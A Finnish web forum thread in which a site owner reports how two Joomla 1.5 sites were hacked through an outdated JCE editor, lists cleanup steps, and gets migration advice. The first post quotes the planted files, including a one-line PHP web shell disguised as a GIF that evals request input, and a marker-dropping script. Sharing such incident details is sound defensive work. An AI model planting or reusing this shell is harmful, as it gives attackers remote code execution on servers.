- Viestejä: 29
- Vastaanotettu kiitos 4
Tiedoksi hakkerointikokemukseni (Joomla 1.5)
- Antti
- Aiheen kirjoittaja
- Poissa
- Tulokas
Vähemmän
Lisää
21.02.2013 13:48 #4642
: Antti
Admata nimimerkillä tuli joskus vanhalle Joomlaportalille kommentoitua.
Antti loi aiheen: Tiedoksi hakkerointikokemukseni (Joomla 1.5)
Lähnnä tiedoksi ja yleiseksi hyödyksi muillekin tämä kokemukseni. Palveluntarjoajalta tuli sitten noottia, että sivuilla on epäilyttäviä tiedostoja ja nämä tilanne pitää korjata heti. Kyseessä oli pari Joomla 1.5 sivustoa ja molemmissa vanhentunut JCE editori. Eli täysin omaa syytäni ja piittaamattomuuttani. Onhan näistä tietoturva-asioista kyllä puhuttu ja opastettu
Molemmissa oli saatu ujutettua tiedostoja kansioon /images/stories/
Toisessa oli seuraavaa tiedostossa gif.php:
Toisessa oli tiedostot x1x.php:Ja tekstitiedosto:
Pikaisella googlaamisella selvisi, että vanhentuneen JCE editorin haavoittuvuutta käytetään yleisesti hyväksi ja haittatiedostot ovat usein kansiossa images/stories.
Toimintani:
- Tarkistus, onko muita tiedostoja muuttunut. Erityisesti .htaccess ja configuration.php tiedostojen tarkistus. Ei äkkisestään löytynyt mitään, eli vaikuttaa siltä että hakkerin yö jäi kesken.
- Käyttäjien tarkistus, ettei uusia administraattoreita ole ilmestynyt.
- Kaikki salasanat uusiksi niin ylläpitoon, kuin tietokantoihin.
- Päivitys uusimpaan JCE editoriin.
Sitten vaan viikonlopuksi migraatiota uusimpaan Joomla 2.5 sarjaan. Ongelmana (miksi migraatio on ylipäänsä jäänyt) on hankalan oloinen vanhalla artisteerilla tekemäni template, enkä viitsisi uusimmasta artisteerista maksaa. Mutta ei auta, vaan nyt on pakko alkaa vaan vääntämään.
Molemmissa oli saatu ujutettua tiedostoja kansioon /images/stories/
Toisessa oli seuraavaa tiedostossa gif.php:
GIF89a1
<?php if (isset($_REQUEST['p1'])) eval(stripslashes($_REQUEST['p1'])); ?>
Toisessa oli tiedostot x1x.php:
<?php
$f = fopen("../m.txt", "w");
fwrite($f, "by misafir");
fclose($f);
$f = fopen("../../tmp/m.txt", "w");
fwrite($f, "by misafir");
fclose($f);
unlink("x1x.php");
echo "o.k.";
?>
by misafir
Pikaisella googlaamisella selvisi, että vanhentuneen JCE editorin haavoittuvuutta käytetään yleisesti hyväksi ja haittatiedostot ovat usein kansiossa images/stories.
Toimintani:
- Tarkistus, onko muita tiedostoja muuttunut. Erityisesti .htaccess ja configuration.php tiedostojen tarkistus. Ei äkkisestään löytynyt mitään, eli vaikuttaa siltä että hakkerin yö jäi kesken.
- Käyttäjien tarkistus, ettei uusia administraattoreita ole ilmestynyt.
- Kaikki salasanat uusiksi niin ylläpitoon, kuin tietokantoihin.
- Päivitys uusimpaan JCE editoriin.
Sitten vaan viikonlopuksi migraatiota uusimpaan Joomla 2.5 sarjaan. Ongelmana (miksi migraatio on ylipäänsä jäänyt) on hankalan oloinen vanhalla artisteerilla tekemäni template, enkä viitsisi uusimmasta artisteerista maksaa. Mutta ei auta, vaan nyt on pakko alkaa vaan vääntämään.
Admata nimimerkillä tuli joskus vanhalle Joomlaportalille kommentoitua.
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- jkwebdesign
- Poissa
- Valvoja
21.02.2013 14:40 #4643
: jkwebdesign
Asiakaslähtöisesti suunniteltuja internet- sekä graafisia palveluita: www.sutjakka.fi
jkwebdesign vastasi aiheeseen: Tiedoksi hakkerointikokemukseni (Joomla 1.5)
Jos sulla on vanha artisteerin filu tallessa, niin nakkaa se vaikka mulle (jari (at) jkwebdesign.fi) niin ulostan sen tuolla uusimmalla Artisteerilla.
Se ei kyllä ole kovinkaan kummoinen tuo uusin versio, mutta kyllä ne pohjat sentään asentuu 2.5:seen.
Jos siitä haluaa kohtuullisen niin pitää käsin repiä pohjien koodista puolet veks, että ei olisi hirveästi ylimääräistä tauhkaa mukana. Voi hieman helpottaa migraatiota, varsinkin jos et ole muokkaillut pohjsta mitään jälkeenpäin.
Se ei kyllä ole kovinkaan kummoinen tuo uusin versio, mutta kyllä ne pohjat sentään asentuu 2.5:seen.
Jos siitä haluaa kohtuullisen niin pitää käsin repiä pohjien koodista puolet veks, että ei olisi hirveästi ylimääräistä tauhkaa mukana. Voi hieman helpottaa migraatiota, varsinkin jos et ole muokkaillut pohjsta mitään jälkeenpäin.
Asiakaslähtöisesti suunniteltuja internet- sekä graafisia palveluita: www.sutjakka.fi
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- Antti
- Aiheen kirjoittaja
- Poissa
- Tulokas
Vähemmän
Lisää
- Viestejä: 29
- Vastaanotettu kiitos 4
21.02.2013 16:01 #4646
: Antti
Admata nimimerkillä tuli joskus vanhalle Joomlaportalille kommentoitua.
Antti vastasi aiheeseen: Tiedoksi hakkerointikokemukseni (Joomla 1.5)
Kiitos tarjouksesta, mutta filuni on sen verran vanha ja sivupohjaa matkan varrella säädetty, että taidan tahtoa Artisteerista eroon ja alkaa näpyttelemään templaten kokonaan uusiksijkwebdesign kirjoitti: Jos sulla on vanha artisteerin filu tallessa, niin nakkaa se vaikka mulle (jari (at) jkwebdesign.fi) niin ulostan sen tuolla uusimmalla Artisteerilla.
Admata nimimerkillä tuli joskus vanhalle Joomlaportalille kommentoitua.
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- jkwebdesign
- Poissa
- Valvoja
21.02.2013 16:26 #4648
: jkwebdesign
Asiakaslähtöisesti suunniteltuja internet- sekä graafisia palveluita: www.sutjakka.fi
jkwebdesign vastasi aiheeseen: Tiedoksi hakkerointikokemukseni (Joomla 1.5)
Hyvä ratkaisu. Jos hyvää framea tarviit pohjalle niin vertex vaikuttaa toimivalta. Olen sitä tässä opiskellut joutessani ja on aika taipuisa ja ominaisuusrikas pohja. Myös responsiivisuus toteutettu erimallikkaasti.
Asiakaslähtöisesti suunniteltuja internet- sekä graafisia palveluita: www.sutjakka.fi
Seuraavat käyttäjät sanoivat kiitos: Antti
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
- buua
- Vieras
07.03.2013 08:34 #4741
: buua
buua vastasi aiheeseen: Tiedoksi hakkerointikokemukseni (Joomla 1.5)
moi
täällä oli ihan sama juttu kuin Antilla 1.5 -versiossa.
päivittelin eilen siten, että kaikki vanhat pois ja uusin joomla (myös uusin jce editor on mukana) uudella sivupohjalla kehiin.
lisäksi tällä ja muilla sivustoilla on viimeaikoina uudelleenohjaukseen ilmestynyt juurikin noita gif.php ja x1x.php hakuja.
tuo on kyllä kiva tuo uudelleenohjaus, kun sinne tulee noita niin tietää ettei ainakaan ole löytynyt sivustolta noita tiedostoja
täällä oli ihan sama juttu kuin Antilla 1.5 -versiossa.
päivittelin eilen siten, että kaikki vanhat pois ja uusin joomla (myös uusin jce editor on mukana) uudella sivupohjalla kehiin.
lisäksi tällä ja muilla sivustoilla on viimeaikoina uudelleenohjaukseen ilmestynyt juurikin noita gif.php ja x1x.php hakuja.
tuo on kyllä kiva tuo uudelleenohjaus, kun sinne tulee noita niin tietää ettei ainakaan ole löytynyt sivustolta noita tiedostoja
Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.
Valvojat: jkwebdesign, Gamoss, JiiKoo
Sivu luotiin ajassa: 0.041 sekuntia